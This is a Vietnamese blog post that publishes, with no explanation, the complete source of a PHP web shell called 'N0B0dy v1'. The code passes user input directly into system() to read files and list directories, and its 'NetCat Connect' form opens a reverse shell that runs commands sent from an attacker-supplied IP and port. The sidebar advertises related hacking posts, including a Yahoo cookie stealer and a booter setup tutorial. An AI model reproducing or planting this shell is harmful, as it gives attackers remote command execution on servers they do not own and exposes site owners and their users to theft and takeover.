• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Code » Shell » N0B0dy v1 Shell

N0B0dy v1 Shell

Unknown Labels: Code, Shell Leave A Comment 21:15
Code:
<style type="text/css">
.or3 {
-moz-box-shadow:inset 0px 1px 0px 0px #f29c93;
-webkit-box-shadow:inset 0px 1px 0px 0px #f29c93;
box-shadow:inset 0px 1px 0px 0px #f29c93;
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #fe1a00), color-stop(1, #ce0100) );
background:-moz-linear-gradient( center top, #fe1a00 5%, #ce0100 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fe1a00', endColorstr='#ce0100');
background-color:#fe1a00;
display:inline-block;
color:#ffffff;
font-family:arial;
font-size:13px;
font-weight:bold;
padding:2px 4px;
text-decoration:none;
text-shadow:1px 1px 0px #b23e35;
}.or3:hover {
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ce0100), color-stop(1, #fe1a00) );
background:-moz-linear-gradient( center top, #ce0100 5%, #fe1a00 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ce0100', endColorstr='#fe1a00');
background-color:#ce0100;
}.or3:active {
position:relative;
top:1px;
}
.or4 {
-moz-box-shadow:inset 0px 1px 0px 0px #ffffff;
-webkit-box-shadow:inset 0px 1px 0px 0px #ffffff;
box-shadow:inset 0px 1px 0px 0px #ffffff;
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ededed), color-stop(1, #dfdfdf) );
background:-moz-linear-gradient( center top, #ededed 5%, #dfdfdf 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ededed', endColorstr='#dfdfdf');
background-color:#ededed;
display:inline-block;
color:#777777;
font-family:arial;
font-size:13px;
font-weight:bold;
padding:2px 4px;
text-decoration:none;
text-shadow:1px 1px 0px #ffffff;
}.or4:hover {
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #dfdfdf), color-stop(1, #ededed) );
background:-moz-linear-gradient( center top, #dfdfdf 5%, #ededed 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#dfdfdf', endColorstr='#ededed');
background-color:#dfdfdf;
}.or4:active {
position:relative;
top:1px;
}

.or2 {
color : #525252;
background-color : #DDDDDD;
width : 510px;
height : 240px;
font-size : 10pt;
}
}
</style>
<html dir=rtl><head><title>uid=99(nobody) gid=99(nobody) groups=99(nobody)</title><meta http-equiv='Content-Type' content='text/html; charset=windows-1256'>
<meta http-equiv='Content-Language' content='ar-ae'><style>body{background: black;color:#f30000}.sub{background:black;border:1px dashed red;color:yellow}</style></head>
<body>
<div align='center'>
<table width=81% style='border:5px solid #808080; background-color:#efefef ' height='100'><tr><td align=center>
<span lang='en-us'>
<font face='Tahoma' size=3 color='#000000'>N0B0dy v1</font><font face='Tahoma' size=3 color=#000000>
</font>
<font face='Tahoma' size=3 color=#000000>
Cod3d |3y Or4nG.M4n</font><font face='Tahoma' size=2 color=#ffffff> </font>
</table>
</div>
<?php
echo '<TABLE border=1 cellSpacing=0 borderColor=# cellPadding=0 width="20%"
bgColor=#444444 align=center #FFFFFF?>
<TBODY>
<TR>
<TD>';
echo '<FONT color=#808080 size=5 face=Terminal>view file</FONT>';
echo '<form action="" method="post">
<input type="submit" class="or3" value="file">
<input type="text" size="71" class="or4" name="file">
</p></form>';
echo '<textarea class="or2" rows=\"10\"name=\"file\" cols=\"61\"> ';
$cat=system("cat {$_POST['file']}");
echo '</textarea></TD><TD>';
echo '<FONT color=#808080 size=5 face=Terminal>view dir</FONT>';
echo '<form action="" method="post">
<input type="text" size="71" class="or4" name="dir">
<input type="submit" class="or3" value="dir"></p></form>';
echo '<textarea class="or2" rows=\"10\"name=\"dir\" cols=\"61\"> ';
$cat=system("ls {$_POST['dir']}");
echo '</textarea></TD></TR></TBODY></TABLE></P></BODY></HTML>';
echo "<TABLE border=1 cellSpacing=0 borderColor=# cellPadding=0 width='90%'
bgColor=#444444 align=center #FFFFFF >
<TBODY>
<TR>
<TD><FONT color=#808080 size=5 face=Terminal>NetCat Connect
</FONT>
<form method='POST' action=''><br>
Your IP & Port:<br>
<input type='submit' class='or3' value='Connect'> <input type='text' name='ip' class='or4' size='24' value=''>
<input type='text' class='or4' name='port' size='5' value='443'><br><br>
</form></TD><TD>XxX</TD></TR></TBODY></TABLE></P></BODY></HTML>";
set_time_limit(0);
$ip =$_POST['ip'];
$portum=$_POST['port'];
if ($ip <> "")
{
$mucx=@fsockopen($ip , $port , $errno, $errstr );
if (!$mucx){
$result = "Error: connect Faild ...";
}
else {

$zamazing0="\n";
fputs ($mucx ,"\n+--------------------+\n\n");
fputs ($mucx ,"\n| -== Welcome ==- |\n\n");
fputs ($mucx ,"\n+--------------------+\n\n");
fputs($mucx , system("uname -a") .$zamazing0 );
fputs($mucx , system("pwd") .$zamazing0 );
fputs($mucx , system("id") .$zamazing0.$zamazing0 );
while(!feof($mucx)){
fputs ($mucx);
$one="[$";
$two="]";
$result= fgets ($mucx, 8192);
$message=`$result`;
fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
}
fclose ($mucx);
}
}
?>

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • PSD - Người & Ta
    DOWNLOAD PSD
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • vBulletin 3.0 Private Message HTML Injection Vulnerability
    source: http://www.securityfocus.com/bid/7594/info A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occ...
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • .NET Cross Site Scripting
    Overview A vulnerability in the .Net Request Validation mechanism allows bypassing the filter and execution of malicious scripts in the bro...
  • SERVER-SIDE INCLUDES (SSI) INJECTION
    It is a web attack were a remote attacker can execute commands on the server remotely, SSI Injections are used to execute some content bef...
  • FCKEditor ASP Version 2.6.8 File Upload Protection Bypass
    - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass - Credit goes to: Mostafa Azizi, Soroush Dalili - Link:http://sourceforge...
  • Hack Yahoo Accounts easily, 2012
    1. Download the required Cookie Stealer Script from here http://freakshare.com/files/cjflnpra/yahoo-cookie-stealer-by-wildhacker.com.rar.h...
  • Exploiting Java Applet JAX-WS Remote Code Execution
    Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada  Java Applet JAX-WS Remote Code Execution  descubierta por  @_jua...
  • [Tutorial] Setting Up Ancient Booter
    Hello guys today ill show you how to setup Web based Shell Booter Ancient Booter Things you'll need for this 1st. Cpanel 2nd. Ancient ...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • PSD - Người & Ta
    PSD - Người & Ta
    DOWNLOAD PSD
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • vBulletin 3.0 Private Message HTML Injection Vulnerability
    source: http://www.securityfocus.com/bid/7594/info A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occ...
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • .NET Cross Site Scripting
    Overview A vulnerability in the .Net Request Validation mechanism allows bypassing the filter and execution of malicious scripts in the bro...
  • SERVER-SIDE INCLUDES (SSI) INJECTION
    It is a web attack were a remote attacker can execute commands on the server remotely, SSI Injections are used to execute some content bef...
  • FCKEditor ASP Version 2.6.8 File Upload Protection Bypass
    - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass - Credit goes to: Mostafa Azizi, Soroush Dalili - Link:http://sourceforge...
  • Hack Yahoo Accounts easily, 2012
    Hack Yahoo Accounts easily, 2012
    1. Download the required Cookie Stealer Script from here http://freakshare.com/files/cjflnpra/yahoo-cookie-stealer-by-wildhacker.com.rar.h...
  • Exploiting Java Applet JAX-WS Remote Code Execution
    Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada  Java Applet JAX-WS Remote Code Execution  descubierta por  @_jua...
  • [Tutorial] Setting Up Ancient Booter
    [Tutorial] Setting Up Ancient Booter
    Hello guys today ill show you how to setup Web based Shell Booter Ancient Booter Things you'll need for this 1st. Cpanel 2nd. Ancient ...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt